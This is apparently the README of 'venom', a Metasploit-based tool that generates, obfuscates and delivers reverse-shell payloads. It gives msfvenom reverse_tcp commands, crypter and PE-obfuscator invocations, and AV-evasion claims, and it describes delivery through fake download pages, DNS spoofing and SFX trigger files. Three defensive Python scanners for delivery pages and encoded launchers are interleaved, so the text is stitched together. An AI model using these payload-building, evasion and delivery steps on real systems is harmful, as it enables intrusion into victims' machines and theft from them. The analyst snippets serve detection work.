option | build | target | format | output |
---|---|---|---|---|
1 | shellcode | unix | C | C |
2 | shellcode | windows | C | DLL |
3 | shellcode | windows | DLL | DLL |
4 | shellcode | windows | C | PYTHON/EXE |
5 | shellcode | windows | C | EXE |
6 | shellcode | windows | PSH-CMD | EXE |
7 | shellcode | windows | C | RUBY |
8 | shellcode | windows | MSIEXEC | MSI |
9 | shellcode | windows | POWERSHELL | BAT(b64) |
10 | shellcode | windows | HTA-PSH | HTA(b64) |
11 | shellcode | windows | PSH-CMD | PS1(b64) |
12 | shellcode | windows | PSH-CMD | BAT(b64) |
13 | shellcode | windows | VBS | VBS(shikata+ascii) |
14 | shellcode | windows | PSH-CMD | VBS |
15 | shellcode | windows | PSH-CMD/C | |
16 | shellcode | webserver | PHP | PHP(b64) |
17 | shellcode | multi OS | PYTHON | PYTHON(b64) |
18 | shellcode | multi OS | JAVA | JAR(rce) |
19 | web_delivery | multi OS | PYTHON/PSH | PYTHON/BAT(b64) |
20 | shellcode | android | DALVIK | APK |
.
.
VENOM 1.0.12 - metasploit Shellcode generator/compiler/listener
Author: peterubuntu10@sourceforge.net [ r00t-3xp10it ]
Suspicious-Shell-Activity (SSA) RedTeam develop @2016
HomePage: http://sourceforge.net/u/peterubuntu10/profile/
Codename: black mamba [ GPL licensed ]
.
.
.
[ DEPENDENCIES ]
Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler)
mingw32 (compiler) | pyherion.py (crypter) | wine (emulator)
PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar
vbs-obfuscator (crypter) | encrypt_PolarSSL (crypter) and
ettercap MitM+DNS_Spoof (venom domain name attack vector)
Venom.sh will download/install all dependencies as they are needed.
Additionally, shell/aux/setup.sh was built to help you install all venom
tool dependencies (metasploit has to be installed manually).
.
.
[ HOW DOES VENOM.SH WORK ? ]
This script uses msfvenom (metasploit) to generate shellcode in
different formats ( c | python | ruby | dll | msi | hta | psh | vbs | php | java ),
then injects the generated shellcode into a template previously written
by me (example: python; "the python function will execute the shellcode
in RAM"). It also uses compilers like gcc (GNU compiler), mingw32
or pyinstaller to build the stand-alone executable file, and it starts a
multi-handler to receive the remote connection (shell or meterpreter).
.
The 'venom generator' tool reproduces some of the techniques used
by Veil-Evasion.py, unicorn.py, powersploit.py, etc.
"P.S. some payloads are undetectable by AV solutions... yes!!!"
One of the reasons for that is the use of a function to execute
the 2nd stage of shell/meterpreter directly in the target's RAM;
the other reason is the use of external obfuscators/crypters.
.
But venom is not a fork of any of these tools, because it is written
in Bash, unlike those tools, which use Python, so I cannot
copy any function written in any of these tools and paste it into my
bash script (obviously). Remember also that veil does not
build the [ .msi .hta .vbs .ps1 .dll .php .jar ] payload formats...
.
Remember also that software like pycrypto, pyinstaller, pywin,
gcc, mingw32, hyperion, Py2exe and PEScrambler was not written by
any of the veil developers; I just did the same as veil, porting
this software into my project to be able to compile, obfuscate
or crypt the shellcode generated by msfvenom...
.
.
[ HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? ]
venom 1.0.11 (malicious_server) was built to take advantage of the
apache2 webserver to deliver payloads (LAN) using a fake webpage
written in html that uses <iframe>, <meta http-equiv> or other
tags to trigger the payload download. Venom also
gives you the ability to deliver your payloads in 2 different ways:
.
1st - run shell/aux/setup.sh to configure the venom domain name
attack vector (http://mega-upload.com), which uses
ettercap (mitm+dns_spoof method) to redirect target traffic
to our phishing webpage (IPv<4/6> configuration required)
.
2nd - use shell/aux/setup.sh to delete the venom domain name
attack vector and force the venom.sh main tool to use default
settings (http://<your-ip-addr>) to deliver payloads using the
'social engineering' technique (send the malicious URL to the target)
.
.
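The delivery pages described above rely on tags that load a resource without the visitor clicking anything. For a defender reviewing a captured landing page, the following Python scanner (an added example, not part of venom or of this page) walks the HTML and reports every auto-loading reference whose target carries one of the output extensions listed in the build table. The sample page, the host name mega-upload.example and the file names are constructed for the example.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Output types from venom's build table; an auto-loading reference to one of
# these is what a payload-delivery landing page looks like.
SUSPECT_EXTENSIONS = {".exe", ".dll", ".msi", ".bat", ".hta", ".ps1", ".vbs", ".jar", ".apk"}

# The URL part of a <meta http-equiv="refresh" content="0; url=..."> tag.
META_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


class DeliveryPageScanner(HTMLParser):
    """Collect references that load without a click (iframe, meta refresh,
    embed/object/script) whose target has a suspect extension."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and a.get("src"):
            self._check("iframe src", a["src"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH_URL.search(a.get("content", ""))
            if m:
                self._check("meta refresh", m.group(1).strip())
        elif tag in ("embed", "object", "script"):
            target = a.get("src") or a.get("data")
            if target:
                self._check(f"{tag} src", target)

    def _check(self, how, url):
        ext = os.path.splitext(urlparse(url).path)[1].lower()
        if ext in SUSPECT_EXTENSIONS:
            self.findings.append((how, url))


def scan_html(html):
    """Return [(how_it_loads, url), ...] in document order."""
    scanner = DeliveryPageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed landing page for the example; the host mega-upload.example and
# the file names are made up.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=http://mega-upload.example/update.exe">
</head><body>
<h1>Your download will start in a moment</h1>
<iframe src="/files/setup.hta" width="0" height="0"></iframe>
<iframe src="https://www.example.com/help.html"></iframe>
<a href="/files/readme.txt">readme</a>
</body></html>"""

if __name__ == "__main__":
    for how, url in scan_html(SAMPLE_PAGE):
        print(f"{how:12} -> {url}")
```

Plain `<a href>` links are deliberately not reported: they need a click, so they are a phishing question rather than an auto-delivery one, and flagging them would drown the zero-size iframe and the meta refresh that actually matter.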
[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]
The generated shellcode cannot be executed on its own...
It has to be embedded into a template (example: batch)
to be executed, so the files inside '/shell/templates' are
templates previously written by me in different languages
(C, batch, ruby, powershell, python, php, vbscript) that trigger
the execution of the shellcode directly in the target's RAM.
.
.
[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]
In some modules venom builds the payload plus a trigger.bat
that 'triggers' the execution of the payload when both are embedded
in a winrar/SFX executable file "upon extraction". Venom gives you
the ability to 'trigger' your payloads in 3 different ways:
.
1st - paste the command provided by venom into the target cmd
2nd - copy both files (payload and trigger.bat) to the target
into the same directory and double-click trigger.bat
3rd - compress both files into one WinRar/SFX file,
send it to the target, and double-click it to execute.
.
.
[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV DETECTIONS ? ]
Let's take the Veil-Evasion python payload (crypted) as an example:
1st - veil uses msfvenom to build shellcode in C format
2nd - then it embeds the shellcode source code into a template
written in python (the function will execute the shellcode)
3rd - it uses 'pyherion.py' to encrypt the source code with a random
AES key + base64 (all together = FUD). "My 'python/exe -> pyherion'
module reproduces the same technique, by using the same crypter ;)"
.
So it depends on the crypters/obfuscators used to scramble the
source code and also on the ability to execute the 2nd stage of the shell
or meterpreter stager directly in the target's RAM (not touching disk).
Another example is the maligno tool, which delivers payloads over https
(SSL/TLS encrypted communications), evading AV detection better.
'There are more techniques, but they are not reproduced by venom'
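The templates and crypters described above all end up with the same observable shape on the target: a script carrying a base64 blob that it decodes just before execution (PowerShell's -EncodedCommand for the BAT(b64)/HTA(b64)/PS1(b64) outputs, base64.b64decode for a pyherion-style python launcher). The triage helper below is an added example written for analysts, not venom's own code: it locates such blobs, decodes them (UTF-16LE for PowerShell, UTF-8 otherwise) and lists the indicator strings found in the decoded stage. The two sample launchers and their stage text are constructed for the example, and the INDICATORS list is illustrative rather than a signature set.

```python
import base64
import binascii
import re

# Strings that, inside a decoded launcher, point at in-memory staging rather
# than ordinary scripting. Constructed for this example; illustrative, not a signature set.
INDICATORS = [
    "Invoke-Expression", "IEX", "DownloadString", "VirtualAlloc",
    "[Byte[]]", "b64decode", "exec(", "ctypes", "AES", "Marshal",
]

# powershell -EncodedCommand (and the -e / -ec / -enc short forms) takes the
# base64 of a UTF-16LE string; this is what the BAT/HTA/PS1 (b64) outputs carry.
PS_ENCODED = re.compile(r"(?i)(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# pyherion-style python launchers wrap their stage in base64.b64decode("...").
PY_B64 = re.compile(r"b64decode\(\s*[bru]*['\"]([A-Za-z0-9+/=]{16,})['\"]")


def decode_blob(blob, utf16):
    """Base64-decode, then decode text as UTF-16LE (PowerShell) or UTF-8,
    falling back to latin-1 so a binary stage still yields something to inspect."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    first = "utf-16-le" if utf16 else "utf-8"
    for enc in (first, "latin-1"):
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    return None


def find_indicators(text):
    low = text.lower()
    return [ind for ind in INDICATORS if ind.lower() in low]


def triage(text):
    """Return (kind, decoded_stage, indicators) for every encoded launcher in text."""
    hits = []
    for m in PS_ENCODED.finditer(text):
        decoded = decode_blob(m.group(1), utf16=True)
        if decoded is not None:
            hits.append(("powershell-encoded", decoded, find_indicators(decoded)))
    for m in PY_B64.finditer(text):
        decoded = decode_blob(m.group(1), utf16=False)
        if decoded is not None:
            hits.append(("python-b64decode", decoded, find_indicators(decoded)))
    return hits


# Constructed samples (not venom output): the encoded form is built here so the
# example is self-contained; the stage text itself is harmless.
PS_STAGE = "$buf = [Byte[]](0x90,0x90); Invoke-Expression 'Write-Host stage'"
SAMPLE_BAT = ("@echo off\r\npowershell -w hidden -e "
              + base64.b64encode(PS_STAGE.encode("utf-16-le")).decode() + "\r\n")
PY_STAGE = 'import ctypes\nprint("stage")\n'
SAMPLE_PY = ("import base64\nexec(base64.b64decode(\""
             + base64.b64encode(PY_STAGE.encode()).decode() + "\"))\n")

if __name__ == "__main__":
    for kind, decoded, found in triage(SAMPLE_BAT + SAMPLE_PY):
        print(kind, found, repr(decoded[:60]))
```

Decoding is the step that matters: an AV or mail filter that only looks at the outer file sees base64 noise, whereas the decoded stage exposes the byte array and the invocation that the page's "execute directly in RAM" description refers to.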
.
.
[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE ? ]
The default way to generate a windows binary payload (.exe)
using msfvenom is through the -f switch (format) and -o (output name):

    msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe
But msfvenom allows us to build shellcode in different formats,
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command:

    sudo msfvenom --help-formats
Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. "Note that we will not use
the -o (save the payload) option; this way the generated shellcode
is only displayed in the current terminal window."

    Using powershell as output format:
    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell
    Using java as output format:
    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java
    Using hex as output format:
    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex
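When one of these text formats turns up inside a captured template, an analyst usually wants the embedded bytes back out, to hash them, size them and match them across samples. The following parser is an added example, not msfvenom's or venom's code: it recovers the byte array from the 0x.. literal style (powershell, csharp), the \x.. escape style (c, python, ruby, perl) and the bare hex style, and returns length plus SHA-256. The four placeholder bytes in the samples (0x90 0x90 0xcc 0xc3) are constructed for the example and are not a payload.

```python
import hashlib
import re

# 0x.. literals, as in the powershell and csharp formats ([Byte[]] $buf = 0x.., 0x..)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2})")
# \x.. escapes, as in the c, python, ruby and perl formats ("\x..\x..")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def extract_stage(text: str) -> bytes:
    """Recover the embedded byte array from a text-format dump.

    The bare hex format is one hex string; otherwise whichever literal style
    yields more bytes wins, so a template with a few stray 0x constants around
    a \\x-escaped buffer still resolves to the buffer."""
    stripped = "".join(text.split())
    if stripped and re.fullmatch(r"[0-9a-fA-F]+", stripped) and len(stripped) % 2 == 0:
        return bytes.fromhex(stripped)
    literal = bytes(int(h, 16) for h in HEX_LITERAL.findall(text))
    escaped = bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))
    return literal if len(literal) >= len(escaped) else escaped


def summarize(text: str) -> dict:
    """Length and SHA-256 of the recovered bytes, for cross-sample matching."""
    stage = extract_stage(text)
    return {"length": len(stage), "sha256": hashlib.sha256(stage).hexdigest()}


# Constructed samples: the same four placeholder bytes (not a payload) in the
# three literal styles msfvenom's text formats use.
PS_SAMPLE = "[Byte[]] $buf = 0x90,0x90,0xcc,0xc3\n"
C_SAMPLE = 'unsigned char buf[] = \n"\\x90\\x90\\xcc\\xc3";\n'
HEX_SAMPLE = "9090ccc3\n"

if __name__ == "__main__":
    for name, sample in (("powershell", PS_SAMPLE), ("c", C_SAMPLE), ("hex", HEX_SAMPLE)):
        print(name, summarize(sample))
```

Because the three representations carry the same bytes, they produce the same hash; that is the property that lets a detection team link a .ps1, a .c template and a raw dump to one generated stage regardless of which output format was chosen.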
.
.
.
[ WHY PYINSTALLER DOES NOT WORK UNDER MY DISTRO ? ]
pyinstaller needs certain dependencies to be installed
under wine, such as python-2.6.6 and pywin32, to work.
The problem is that the dependencies needed must match
the attacker machine's arch and chip brand
(x86 | x64 | AMD | INTEL). To install it manually,
just unpack 'shell/obfuscate/pyinstaller-2.0.tar.gz'
and follow the instructions inside readme-pedr0.txt.
pyinstaller command used by this script:

    su <user_name> -c 'pyinstaller --noconsole --onefile <spec_file>'
.
.
[ HOW CAN I USE PESCRAMBLER.EXE ? ]
PEScrambler.exe is a windows binary executable file
and, like pyinstaller, does not run under the 'root user account'.
If you wish to use it, open a terminal (normal user)
and issue the following command:

    su <user_name> -c 'wine pescrambler.exe -i <Infile.exe> -o <outfile.exe>'
(pescrambler.exe does not compile payloads to .exe format;
it takes an executable.exe and obfuscates its code
to better evade AV detection (not very effective now))
.
.
.
[ DESCRIPTION OF NATIVE CRYPTERS/COMPILERS ]
pyherion.py = Python 'crypter' that builds a dynamic AES/base64
encoded launcher (with a random key) that is decoded/decrypted
in memory (RAM) and then executed, 'evading AV detection'.

    python pyherion.py <file-to-crypt.py> <outfile.py>
PEScrambler.exe = crypter to obfuscate an existing .exe

    su <user_name> -c 'wine pescrambler.exe -i <Infile.exe> -o <outfile.exe>'

pyinstaller.py = compiles an existing python file into one .exe

    su <user_name> -c 'pyinstaller --noconsole --onefile <file-to-be-compiled.py>'

gcc = GNU compiler to build unix executable files

    gcc -fno-stack-protector -z execstack <template.c> -o <outfile>

mingw32 = cross compiler to build .exe executable files

    i586-mingw32msvc-gcc <template.c> -o <outfile.exe> -mwindows

encrypt_polarSSL = encrypt your payloads with base64 + a random AES key..

    python encrypt_payload_polar.py <password to generate AES> <infile>

vbs-obfuscator = encrypt your payload.vbs using ascii (only vbs payloads)

    python vbs-obfuscator.py <inFile.vbs> <outFile.vbs>
.
.
.
[ SPECIAL THANKS/CREDITS TO ]:
HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)
@harmj0y (pyherion) | @G0tmi1k @christruncker @harmj0y (ruby_stager)
David Cortesi (pyinstaller) | astr0baby (reflective fud dll injection method)
0entropy (powershell poc's) | Matthew Graeber (powershell poc's)
alor&naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya (debugging)
Suriya Prakash (debugging/recording tutorials) | and of course me (r00t-3xp10it) ^_^
Copyright © 2016 - venom shellcode generator